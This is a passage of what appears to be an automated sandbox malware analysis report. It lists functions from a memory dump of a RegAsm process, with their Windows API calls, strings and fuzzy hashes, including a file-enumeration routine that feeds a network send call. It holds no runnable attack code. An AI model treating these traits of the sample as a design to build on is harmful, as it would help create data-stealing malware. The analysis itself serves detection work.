Opcode Fuzzy Hash: 3fb3a80cf2e6475b59f25c82e33835eae668523d95a8c683cc80ed935d5ac12b
Instruction Fuzzy Hash: 0641F47160430066DA15FA31C95AAAE37A99BD1705F40093FBB427B1D2EE7C9A0CC75A

Function 004442D4 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692

Part of subcall function 0043C614: _free.LIBCMT ref: 0043C673
Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C680

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00444328
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00444379
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00444439

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID:
API String ID: 2829624132-0
Opcode ID: 32f4b9d895ea98af3fd9a5171a8db8fa53e4e0c53919800eec0ada9f8816a44a
Instruction ID: 1f87c0796c419ade2eae767289d25b359e6e8943c577617cf55981828d241cac
Opcode Fuzzy Hash: 32f4b9d895ea98af3fd9a5171a8db8fa53e4e0c53919800eec0ada9f8816a44a
Instruction Fuzzy Hash: C7619371500207ABFF289F24CC82BBA77A8EF44704F1441BAED05D6681EB7CD992DB58

Function 00438983 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,00438959,00000003,004619C0,0000000C,00438AB0,00000003,00000002,00000000,?,0043B5D8,00000003), ref: 004389A4
TerminateProcess.KERNEL32(00000000,?,00438959,00000003,004619C0,0000000C,00438AB0,00000003,00000002,00000000,?,0043B5D8,00000003), ref: 004389AB
ExitProcess.KERNEL32 ref: 004389BD

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 028ca32864a5d8a00decbcdfeac547a14969b7e8f12dafd009958018ff53265b
Instruction ID: ad1314456494e3ed302f9715d1c959e7e451621885e8079f11eafe7d6208c2ac
Opcode Fuzzy Hash: 028ca32864a5d8a00decbcdfeac547a14969b7e8f12dafd009958018ff53265b
Instruction Fuzzy Hash: 12E0B675900648ABCF226F65DD09A597B69FF89345F40106AF90A8A221CB79ED42CB88

Function 00440A59 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 00440BEC

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 6eabc5f11ec1ca2a56f69ff92e525cdbe2e1dd9f0c076f28e47ccd50a7368115
Instruction ID: 5f8074742a1868b626ed342c3e98615176126d660209178caf4e6f80b034c56a
Opcode Fuzzy Hash: 6eabc5f11ec1ca2a56f69ff92e525cdbe2e1dd9f0c076f28e47ccd50a7368115
Instruction Fuzzy Hash: 753137719002486FEB24DE79CC84EFB7BBDDB85308F1002AEFA5897251E634AD518B54

Function 0043D32C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00439B98,?,00000004), ref: 0043D37F

Strings

GetLocaleInfoEx, xrefs: 0043D347

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: b71d05b3c7fe1d4ca99e8279e8949133a53b058c086b6bf9e28b218b471bedce
Instruction ID: ce4fd747b54faa4bd7a1eeb3bcc1357c013179f80075dd4b8a2cbe4382d00d18
Opcode Fuzzy Hash: b71d05b3c7fe1d4ca99e8279e8949133a53b058c086b6bf9e28b218b471bedce
Instruction Fuzzy Hash: B0F02431E40318BBCB116F71EC02FAE7B65EF08B11F10012AFD05662A0DA75AE14D79E

Function 0043B690 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dc2aaa5ba629767c24c60991e20e51c41170b5e5616752661aee279650f1187
Instruction ID: 95a343e324232c7d98835ffcd34e263639f39472ec0b3937548a97988adb3f04
Opcode Fuzzy Hash: 3dc2aaa5ba629767c24c60991e20e51c41170b5e5616752661aee279650f1187
Instruction Fuzzy Hash: EA022D71E002199BDF14DFA9C8807AEFBF5EF88324F25826AD919E7344D734AD418B94

Function 00404CF3 Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 00404D0E
FindNextFileW.KERNEL32(00000000,?,?), ref: 00404DCE

Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNextsend
String ID:
API String ID: 4113138495-0
Opcode ID: b7052913901af0115e8feff582df357ddef7403b4e3299c4d437fe83a43b6e7c
Instruction ID: 86d4ecdf3890dc42d56e92d70e3d1e8f32d6d22d1a4151bfebc482781cc436e9
Opcode Fuzzy Hash: b7052913901af0115e8feff582df357ddef7403b4e3299c4d437fe83a43b6e7c
Instruction Fuzzy Hash: 0C218171910118AACB04FBA1DC9ADEE7738AF51318F40017BF706771D1EF786A89CA99

Function 0044553C Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00445537,?,?,00000008,?,?,00449C9D,00000000), ref: 00445769

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 57b167dff027822b40cd9bf0cc99b9618bd263b207ef16c4545e6c5eba121c6f
Instruction ID: d9807f6ae093f4c5904e94fcdbc25e2fc9976d51ca65457f1ed2f32b0d277757
Opcode Fuzzy Hash: 57b167dff027822b40cd9bf0cc99b9618bd263b207ef16c4545e6c5eba121c6f
Instruction Fuzzy Hash: F1B17F31510A08DFEB15CF28C486B657BE0FF45364F258659E89ACF3A2C739E992CB44

Function 0042C3C6 Relevance: 1.6, APIs: 1, Instructions: 134COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 0042C3DF

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 4657d06232d56aef3570b1a27ce3a6ffe9e3c18176b919e5c76832e2b4ae0a01
Instruction ID: 2697a07927edba09fa4b120a04b7d5dd22db01720c8de2c3ab983906f36902a3
Opcode Fuzzy Hash: 4657d06232d56aef3570b1a27ce3a6ffe9e3c18176b919e5c76832e2b4ae0a01
Instruction Fuzzy Hash: CE519E71A012259BEF14CF69E9C16AEBBF4FB48314F65806AC815E7350E3789940CB65

Function 00444524 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692

Part of subcall function 0043C614: _free.LIBCMT ref: 0043C673
Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C680

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00444578

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: fc2171e14334ea3e7d55d49ed6e0648b68154e3df0422f9748cdb8287be33ce6
Instruction ID: b26485aea30f030f9f54250f3ad1374887b22aef8311f1835d05ff9e541aa45f
Opcode Fuzzy Hash: fc2171e14334ea3e7d55d49ed6e0648b68154e3df0422f9748cdb8287be33ce6
Instruction Fuzzy Hash: CA217172900206BBEF249F25DC82BBB73A8EF85314F10417BEA01D6241EB799D55CB59

Function 004441AC Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692

EnumSystemLocalesW.KERNEL32(004442D4,00000001,00000000,?,0043A13A,?,00444901,00000000,?,?,?), ref: 0044421E

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 711f43e458a69ee5f63f55250c80b62ac370d985356c8e9e332dbec9468b49f5
Instruction ID: e40f59eb0fa5de4c9f3a16e8b0591c3d531b47424b4bb394e983a0f53163e8a9
Opcode Fuzzy Hash: 711f43e458a69ee5f63f55250c80b62ac370d985356c8e9e332dbec9468b49f5
Instruction Fuzzy Hash: 1111253A2007059FEB189F79C8966BAB7A1FFC0399B14442EE98687B40D375B942CB44

Function 00444754 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004444F2,00000000,00000000,?), ref: 00444780

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: 849f1fabcbe4ac2e6b94c621ba7373402f76eb41b3920df2b534d741acd0084d
Instruction ID: 3707f94c9474d79ec8c8af264f29abd72a84bbcb21354a1b498b6705759ad170
Opcode Fuzzy Hash: 849f1fabcbe4ac2e6b94c621ba7373402f76eb41b3920df2b534d741acd0084d
Instruction Fuzzy Hash: 81F0F9369001157BFB245A658846BBB7798EB81768F15056AEC05A3240EB78BE42C6D4

Function 00444247 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692

EnumSystemLocalesW.KERNEL32(00444524,00000001,?,?,0043A13A,?,004448C5,0043A13A,?,?,?,?,?,0043A13A,?,?), ref: 00444293

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: b77e861aaf121e6850db94ffa8edcef269b7f7f26ea000de3514022ea6fb6281
Instruction ID: ed68b6acb7b79b841aa03ef9907d8241165ad6fda512d4fef2396eaa6fb624ec
Opcode Fuzzy Hash: b77e861aaf121e6850db94ffa8edcef269b7f7f26ea000de3514022ea6fb6281
Instruction Fuzzy Hash: 3FF022362003041FEB249F399882B7B7B94FFC03A8F05446EF9019B680D6B5AC01CA44

Function 0043CEC5 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0043AD2A: EnterCriticalSection.KERNEL32(-00465500,?,004386A9,00000000,004619A0,0000000C,00438664,00000000,?,?,0043AFC8,00000000,?,0043C6C9,00000001,00000364), ref: 0043AD39

EnumSystemLocalesW.KERNEL32(0043CE7F,00000001,00461B48,0000000C), ref: 0043CEFD

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: cc012cbae077de1091ac5ef2746fcd0995d3cc78f54d382beea4263f038d526b
Instruction ID: eba351e3cc4fa079fe98c46d05503de7d11671559dc86b79a4a0c9269dfae67b
Opcode Fuzzy Hash: cc012cbae077de1091ac5ef2746fcd0995d3cc78f54d382beea4263f038d526b
Instruction Fuzzy Hash: 84F09C71A60204EFDB10EF69D886B4D77F1EB48715F10502AF510DB1E1D7B949409F9E

Function 00444161 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692

EnumSystemLocalesW.KERNEL32(004440B8,00000001,?,?,?,00444923,0043A13A,?,?,?,?,?,0043A13A,?,?,?), ref: 00444198

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 857805ff5cfac31aa780aa4bfdb7f2fddcff3c9821c112fd3dce12a2e24e9f63
Instruction ID: 3940252ce8a352bd8bebd02a5c5d0b3aa0470f6d38ba7cac213a61fdd0367e1a
Opcode Fuzzy Hash: 857805ff5cfac31aa780aa4bfdb7f2fddcff3c9821c112fd3dce12a2e24e9f63
Instruction Fuzzy Hash: D2F0553A30020557DB049F35C849B6A7F90EFC2710F47005EEA058B290C23AA882C798

Function 0040A7D3 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,0040EF02,00467C58,004685A8,00467C58,00000000,00467C58,00000000,00467C58,5.2.0 Light), ref: 0040A7E7

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 7668136720ce9beca500dd0eddb669708cdd09ed6dd5243c8b2d56bff9acd360
Instruction ID: 246ef45fcc1c43f14e643255eb9989aa517e7b2afcbfdbb0636345a12660214f
Opcode Fuzzy Hash: 7668136720ce9beca500dd0eddb669708cdd09ed6dd5243c8b2d56bff9acd360
Instruction Fuzzy Hash: 14D05B3074011D77D51496859C0EEAA779CD702755F000166BE04D72C0D9E05E0057D1

Function 0042C6C4 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0002C6D0,0042C1C4), ref: 0042C6C9

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: e4160cd21736b9b724a45f96a50e5b9c9ea1004a171853f735f238ca1bdafe9f
Instruction ID: e9757334f95d2b5005854ca62c29f3dcca458c893af1fbba705ce56ddbb622d7
Opcode Fuzzy Hash: e4160cd21736b9b724a45f96a50e5b9c9ea1004a171853f735f238ca1bdafe9f
Instruction Fuzzy Hash:

Function 0043680C Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0043697C

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 00ef9a7d3e26296a65ddfeab7daadc8cf88223517f11c320cda8b7a0b82f5a53
Instruction ID: 30eacb981cb6278b9ede921612644d04ced7297ace774c55fa6f37c82e0ba73a
Opcode Fuzzy Hash: 00ef9a7d3e26296a65ddfeab7daadc8cf88223517f11c320cda8b7a0b82f5a53
Instruction Fuzzy Hash: 8B5176A060164777EF3CA92884567BF67999F0E304F1AF80FD9C2D7382C62C9D06861E

Function 00436A3B Relevance: 1.5, Strings: 1, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 00436BAB

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: c4e470230f592cf2ea01b95aa03d306a2ecdbbcafd652f7a80073b6ae47f5522
Instruction ID: 621a70b502a6b5c6d37222a8ff5bbc931b0a3dc879fdfe3d88000f589cd0ccb1
Opcode Fuzzy Hash: c4e470230f592cf2ea01b95aa03d306a2ecdbbcafd652f7a80073b6ae47f5522
Instruction Fuzzy Hash: D551576060060B76DB34696884557BF67D89B0F344F1AF41FD882EB382C50DFD06975E

Function 0041FB71 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

@, xrefs: 0041FBBB

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: afc649a906c918a612c1bf2ed60efbe29a77397457307a03108316727d093398
Instruction ID: a32e6f4fee792168acabc3a99eaa4178362968a550f51f58417a862e767cbfd4
Opcode Fuzzy Hash: afc649a906c918a612c1bf2ed60efbe29a77397457307a03108316727d093398
Instruction Fuzzy Hash: B541D276D1061D9BCB04CFA9C5816DEFBF1FF88310F25816AE905B3350D379AA828B84

Function 0042E240 Relevance: 1.3, Strings: 1, Instructions: 76COMMON

Download Yara Rule

Strings

W3@, xrefs: 0042E244

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: W3@
API String ID: 0-335922567
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: a6e552f00ab565f691ebadb1e40a45b636efe887c5fa14ffde51f1c265891404
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 74113677300071C396448A2FF4B82B7A78DEAC63207BC43F7D1438B758D12AE401952C

Function 0044B4B0 Relevance: .7, Instructions: 651COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be7d55350c29dde4d9bf8e952ff0af0bb26ed02bc87ce8e620404103b0c57f2d
Instruction ID: 728b4bcd2b28723637816e06e4881ec1bd9ce59320bf7fec46daf2244288b495
Opcode Fuzzy Hash: be7d55350c29dde4d9bf8e952ff0af0bb26ed02bc87ce8e620404103b0c57f2d
Instruction Fuzzy Hash: 6D322321D69F454DE7239638C862336A248EFB33C5F54C737E81AB5AA6EF29C4C34149

Function 00445C59 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27ba41c287480f5b8183f811836f76d7f550f221e5fc56609452204e267aaea9
Instruction ID: 6584078b23f89aed32d62d9620e82e9003f0c038ea44ebf7209e3ce05309007b
Opcode Fuzzy Hash: 27ba41c287480f5b8183f811836f76d7f550f221e5fc56609452204e267aaea9
Instruction Fuzzy Hash: 09321921D29F414DE7239634D825336A648AFB73C9F16D737F819B5EAAEB28C4C34109

Function 00417621 Relevance: .6, Instructions: 585COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 273094f8efc9c5ee53709d3987aae02e3c60b7ddbc8b4795d374de1f405ad226
Instruction ID: 06fb409b2eb98aa264058a924fa4ce0d35fc76914ffdd7f9b1cda4f708cda101
Opcode Fuzzy Hash: 273094f8efc9c5ee53709d3987aae02e3c60b7ddbc8b4795d374de1f405ad226
Instruction Fuzzy Hash: 2422C131A082199BDF15DF68C4807FEB7B5AF44314F18416BEC55AB382DB389E85CB98

Function 0042B2F1 Relevance: .5, Instructions: 504COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 093cffccdb6c66a0d7340a85fd8f8add5e90d94a679726dfc5632c4f1750100d
Instruction ID: 4ec5c20c67ca4022d545f9580ae9730a7cccf3cf0bf7266e2a21cc6c1313b906
Opcode Fuzzy Hash: 093cffccdb6c66a0d7340a85fd8f8add5e90d94a679726dfc5632c4f1750100d
Instruction Fuzzy Hash: 15127F36F002288BDB14DBE5E9566BDB3F2EF88314F2544AAD805F7381DA386D01DB94

Function 0041F4D3 Relevance: .4, Instructions: 411COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c968e86ef4a24f4bac8ff0bd1e5c72ae7075c91140b07428d43092b41367d369
Instruction ID: 178965d57fe9952de82b7b97e0f16105608be4409eb057888a0a3f3c60355087
Opcode Fuzzy Hash: c968e86ef4a24f4bac8ff0bd1e5c72ae7075c91140b07428d43092b41367d369
Instruction Fuzzy Hash: 79026D716006518FC318CF2EE89057AB7F1FB8D302745863AE495CB796DB34E926CB98

Function 0043120A Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 191d1750cc2476baf38904309f755c3ad6ad9953389e3caa19d10b1414658eb7
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 7CC197322050930ADF2D8679887413FFAE15EA67B171A276FD8B3CB2D4EF28D524D524

Function 0041EFDC Relevance: .3, Instructions: 342COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aae66948a7d14490cd8c9109fbf7412b48e3904d3f2339df8b430768c5abf669
Instruction ID: 0abdb9aafc57bb68438a50acd3f2ecbd6e1049ece67ae85b0bc1d56911e8b7ce
Opcode Fuzzy Hash: aae66948a7d14490cd8c9109fbf7412b48e3904d3f2339df8b430768c5abf669
Instruction Fuzzy Hash: 51E16274A102688FCB08CF5DE8A18BE73F1FB49302745456EE582D7392CB35EA16DB94

Function 0043163F Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: ee6c2d19268771462c9197f7b73242e64c44eb7a896abee3da5328890589ff8c
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 55C1D5322061930ADF2D867AC83413FBAE15E967B171A276FD4B3CB2D4EF18D524D624

Function 00430DD5 Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

